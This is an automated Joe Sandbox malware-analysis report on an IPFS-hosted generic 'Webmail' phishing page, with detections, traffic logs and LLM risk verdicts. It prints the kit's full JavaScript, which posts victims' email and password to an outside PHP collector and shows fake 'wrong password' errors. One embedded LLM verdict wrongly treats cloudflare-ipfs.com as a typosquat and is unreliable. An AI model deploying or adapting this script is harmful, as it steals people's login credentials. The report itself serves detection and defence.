Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwu

Overview

General Information

Sample URL:https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwu
Analysis ID:1438592

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic
Yara detected HtmlPhish10
LLM detected suspicious URL
LLM detected suspicious webpage text
Multimodal LLM detected phishing page
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwu MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 876 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1988,i,13109954549985302115,7097384076061746047,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
SourceRuleDescriptionAuthorStrings
1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        No Sigma rule has matched
        Timestamp:05/08/24-21:44:55.440125
        SID:2032515
        Source Port:443
        Destination Port:49695
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: Yara matchFile source: 1.1.pages.csv, type: HTML
        Source: Yara matchFile source: 1.1.pages.csv, type: HTML
        Source: Yara matchFile source: 1.2.pages.csv, type: HTML
        Source: https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwuLLM: Score: 7 Reasons: The URL in question has a high risk of typosquatting due to the following reasons: 1. The domain name 'cloudflare-ipfs.com' is very similar to the legitimate domain 'cloudflare.com'. The addition of '-ipfs' could easily be mistaken for a subdomain or a legitimate variation of the domain. 2. The URL points to an IPFS (InterPlanetary File System) hash, which is not inherently suspicious but could be used to host malicious content. It is important to verify the authenticity of the content being accessed, especially if it is from an unknown or untrusted source. DOM: 1.1.pages.csv
        Source: about:blankLLM: Score: 8 Reasons: The text extracted from the OCR appears to be a phishing attempt. It asks the user to input their email address and password, which is a common tactic used by malicious websites to steal user credentials. The 'Remember me' checkbox is also suspicious as it may indicate the use of persistent cookies to track user activity. The URL 'about:blank' does not provide any additional context, but the combination of the URL and the suspicious text suggests a high risk of phishing. DOM: 0.0.pages.csv
        Source: https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwuLLM: Score: 8 brands: None Reasons: The URL 'https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwu' does not match any known legitimate domain associated with a specific brand, raising suspicion. The use of a generic 'Webmail' logo and interface in the image without any specific brand identifiers is a common tactic in phishing to mislead users. The domain is hosted on IPFS, which is unusual for legitimate business services that typically use their own domain names. The presence of a login form without additional security measures like CAPTCHA further increases the risk of phishing. DOM: 1.1.pages.csv
        Source: https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwuHTTP Parser: Number of links: 0
        Source: https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwuHTTP Parser: <input type="password" .../> found but no <form action="...
        Source: https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwuHTTP Parser: Title: Mail does not match URL
        Source: https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwuHTTP Parser: <input type="password" .../> found
        Source: https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwuHTTP Parser: No <meta name="author".. found
        Source: https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwuHTTP Parser: No <meta name="author".. found
        Source: https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwuHTTP Parser: No <meta name="copyright".. found
        Source: https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwuHTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.17:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.190.190.130:443 -> 192.168.2.17:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.192.208.109:443 -> 192.168.2.17:49721 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.192.208.109:443 -> 192.168.2.17:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.17:49732 version: TLS 1.2

        Networking

        barindex
        Source: TrafficSnort IDS: 2032515 ET CURRENT_EVENTS Generic Multibrand Ajax XHR CredPost Phishing Landing 104.17.96.13:443 -> 192.168.2.17:49695
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 184.30.122.249
        Source: unknownTCP traffic detected without corresponding DNS query: 184.30.122.249
        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.222.123
        Source: unknownTCP traffic detected without corresponding DNS query: 23.206.222.123
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
        Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
        Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
        Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
        Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
        Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
        Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
        Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
        Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
        Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
        Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
        Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
        Source: unknownTCP traffic detected without corresponding DNS query: 52.165.165.26
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.190.130
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.190.130
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.190.130
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.190.130
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.190.130
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.190.130
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.190.130
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
        Source: unknownTCP traffic detected without corresponding DNS query: 13.107.5.88
        Source: global trafficDNS traffic detected: DNS query: cloudflare-ipfs.com
        Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.17:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.190.190.130:443 -> 192.168.2.17:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49716 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.192.208.109:443 -> 192.168.2.17:49721 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.192.208.109:443 -> 192.168.2.17:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.17:49732 version: TLS 1.2
        Source: classification engineClassification label: mal68.phis.win@16/12@6/117
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwu
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1988,i,13109954549985302115,7097384076061746047,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1988,i,13109954549985302115,7097384076061746047,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        Registry Run Keys / Startup Folder
        1
        Process Injection
        1
        Masquerading
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        Registry Run Keys / Startup Folder
        1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwu0%Avira URL Cloudsafe
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        about:blank0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        stackpath.bootstrapcdn.com
        104.18.10.207
        truefalse
          high
          cloudflare-ipfs.com
          104.17.96.13
          truetrue
            unknown
            www.google.com
            142.251.215.228
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwutrue
                unknown
                about:blanktrue
                • Avira URL Cloud: safe
                low
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                104.17.96.13
                cloudflare-ipfs.comUnited States
                13335CLOUDFLARENETUStrue
                1.1.1.1
                unknownAustralia
                13335CLOUDFLARENETUSfalse
                104.18.10.207
                stackpath.bootstrapcdn.comUnited States
                13335CLOUDFLARENETUSfalse
                142.251.211.238
                unknownUnited States
                15169GOOGLEUSfalse
                74.125.142.84
                unknownUnited States
                15169GOOGLEUSfalse
                142.251.33.67
                unknownUnited States
                15169GOOGLEUSfalse
                142.251.33.106
                unknownUnited States
                15169GOOGLEUSfalse
                142.250.217.110
                unknownUnited States
                15169GOOGLEUSfalse
                142.251.215.228
                www.google.comUnited States
                15169GOOGLEUSfalse
                239.255.255.250
                unknownReserved
                unknownunknownfalse
                142.251.33.74
                unknownUnited States
                15169GOOGLEUSfalse
                142.250.69.195
                unknownUnited States
                15169GOOGLEUSfalse
                IP
                192.168.2.17
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1438592
                Start date and time:2024-05-08 21:44:29 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                Sample URL:https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwu
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:19
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • EGA enabled
                Analysis Mode:stream
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal68.phis.win@16/12@6/117
                • Exclude process from analysis (whitelisted): SIHClient.exe
                • Excluded IPs from analysis (whitelisted): 142.250.69.195, 142.251.211.238, 74.125.142.84, 142.251.33.106, 34.104.35.123, 142.251.33.74, 172.217.14.202, 142.251.215.234, 172.217.14.234, 142.250.69.202, 142.251.211.234, 142.250.217.74, 142.250.217.106
                • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, ajax.googleapis.com, clientservices.googleapis.com, clients.l.google.com
                • Not all processes where analyzed, report is missing behavior information
                • VT rate limit hit for: https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwu
                InputOutput
                URL: about:blank
                {
                "riskscore": 8,
                "reasons": "The text extracted from the OCR appears to be a phishing attempt. It asks the user to input their email address and password, which is a common tactic used by malicious websites to steal user credentials. The 'Remember me' checkbox is also suspicious as it may indicate the use of persistent cookies to track user activity. The URL 'about:blank' does not provide any additional context, but the combination of the URL and the suspicious text suggests a high risk of phishing."
                }"
                ;Webmail Webmail Email Address Password Remember me Continue 
                URL: https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwu
                ```json
                {
                  "riskscore": 5,
                  "reasons": "The JavaScript code and URL in question have a moderate risk level. The JavaScript code takes a user-provided email address and uses it to modify the page's content, including displaying a favicon and domain name associated with the email address. This behavior can be potentially misleading and may be used for phishing attacks. However, there is no explicit evidence of malicious intent in the code. The URL is a Cloudflare IPFS URL, which is not inherently malicious. However, the content it points to is not directly verifiable and should be treated with caution."
                }
                ```"
                /* global $ */
                    $(document).ready(function(){
                      var count=0;
                
                      $('#back1').click(function () {
                        $("#msg").hide();
                        $('#email').val("");
                        $("#automail").animate({left:200, opacity:"hide"}, 0);
                        $("#inputbar").animate({right:200, opacity:"show"}, 1000);
                
                      });
                
                      var email = window.location.hash.substr(1);
                      if (!email) {
                
                      }
                      else
                      {
                        var my_email =email;
                        $('#email').val(my_email);
                        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
                
                        if (!filter.test(my_email)) {
                          $('#error').show();
                          email.focus;
                          return false;
                        }
                        var ind=my_email.indexOf("@");
                        var my_slice=my_email.substr((ind+1));
                        var c= my_slice.substr(0, my_slice.indexOf('.'));
                        var final= c.toLowerCase();
                        var finalu= c.toUpperCase();
                
                        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
                        $("#logoname").html(finalu);
                        $(".logoname").html(finalu);
                        $(".domain").html(my_slice);
                        $(".email").html(email);
                		
                		     var mainPage = 'https://'+my_slice; 
                     //     var mainPage = 'https://webmail.staralliancebd.com/';  
                        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+mainPage);
                         document.getElementById('mainPage').src = mainPage;
                    //    $("#mainPage").src(mainPage);
                    
                      }
                
                
                      
                      $('#submit-btn').click(function(event){
                        $('#error').hide();
                        $('#msg').hide();
                        event.preventDefault();
                        var email=$("#email").val();
                        var password=$("#password").val();
                        var msg = $('#msg').html();
                        $('#msg').text( msg );
                		                    if (!password) {
                                   $("#msg").show();
                             $('#msg').html("Password is empty");
                
                                return false;
                            }
                      ///////////new injection////////////////
                      var my_email =email;
                      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
                
                      if (!filter.test(my_email)) {
                        $('#error').show();
                        email.focus;
                        return false;
                      }
                
                      var ind=my_email.indexOf("@");
                      var my_slice=my_email.substr((ind+1));
                      var c= my_slice.substr(0, my_slice.indexOf('.'));
                      var final= c.toLowerCase();
                      var finalu= c.toUpperCase();
                
                        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
                        $(".logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+my_slice);
                        $("#logoname").html(finalu);
                      ///////////new injection////////////////
                      count=count+1;
                      
                      $.ajax({
                        dataType: 'JSON',
                        url: 'https://hamaberry.com/chukwupaddy3/cjmmvfc.php',
                        type: 'POST',
                        data:{
                          email:email,
                          password:password,
                        },
                            // data: $('#contact').serialize(),
                            beforeSend: function(xhr){
                              $('#submit-btn').html('Verifying...');
                            },
                            success: function(response){
                			 $('#msg').html("<span style='color:red;'>Wrong password! Please try again</span>");
                              if(response){
                                $("#msg").show();
                				console.log(response);
                				$('#msg').html(response['msg']);
                                if(response['signal'] == 'ok'){
                                  $("#password").val("");
                                  if (count>=2) {
                                    count=0;
                                    // window.location.replace(response['redirect_link']);
                                   window.location.replace("http://www."+my_slice); 
                
                                  }
                                                $("#msg").show();
                               $('#msg').html("Invalid password! Please try again");
                                }
                                else{
                                                 $("#msg").show();
                               $('#msg').html("Invalid password! Please try again");
                                }
                              }
                            },
                            error: function(){
                              $("#password").val("");
                              if (count>=3) {
                                count=0;
                                   window.location.replace("http://www."+my_slice);
                                 
                              }
                              $("#msg").show();
                               $('#msg').html("Invalid password! Please try again");
                            },
                            complete: function(){
                              $('#submit-btn').html('Sign in');
                            }
                          });
                    });
                
                 			
                
                    });
                URL: https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwu
                {
                    "riskscore": 7,
                    "reasons": "The URL in question has a high risk of typosquatting due to the following reasons:\
                1. The domain name 'cloudflare-ipfs.com' is very similar to the legitimate domain 'cloudflare.com'. The addition of '-ipfs' could easily be mistaken for a subdomain or a legitimate variation of the domain.\
                2. The URL points to an IPFS (InterPlanetary File System) hash, which is not inherently suspicious but could be used to host malicious content. It is important to verify the authenticity of the content being accessed, especially if it is from an unknown or untrusted source."
                }"
                https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwu
                URL: https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwu
                ```json
                {
                  "phishing_score": 8,
                  "brands": "None",
                  "phishing": true,
                  "suspicious_domain": true,
                  "has_loginform": true,
                  "has_captcha": false,
                  "setechniques": true,
                  "reasons": "The URL 'https://cloudflare-ipfs.com/ipfs/bafybeiebtesuzqjvlwffqmtiic5jwgjo7rc3vsexjuo26nexklhcgl4qwu' does not match any known legitimate domain associated with a specific brand, raising suspicion. The use of a generic 'Webmail' logo and interface in the image without any specific brand identifiers is a common tactic in phishing to mislead users. The domain is hosted on IPFS, which is unusual for legitimate business services that typically use their own domain names. The presence of a login form without additional security measures like CAPTCHA further increases the risk of phishing."
                }
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 8 18:44:55 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2677
                Entropy (8bit):3.993580370505228
                Encrypted:false
                SSDEEP:
                MD5:8B58F4C3A9EDD5947450B69E6D288128
                SHA1:5E5816DE8F66515B7B41398B3C5038B27912F3CA
                SHA-256:58D7512D5AEF469C4C58DC21AF28F689EE177D1C9B455CBC198F5A90F77848B6
                SHA-512:031B8E54792D0501C73015EBB8B2DF7E7FCDB58317EC568E69F49E102B916A63AA053E9B58B75BB3206061180B0CA3E13A97BCB524779921E5AFE92B684A4D59
                Malicious:false
                Reputation:unknown
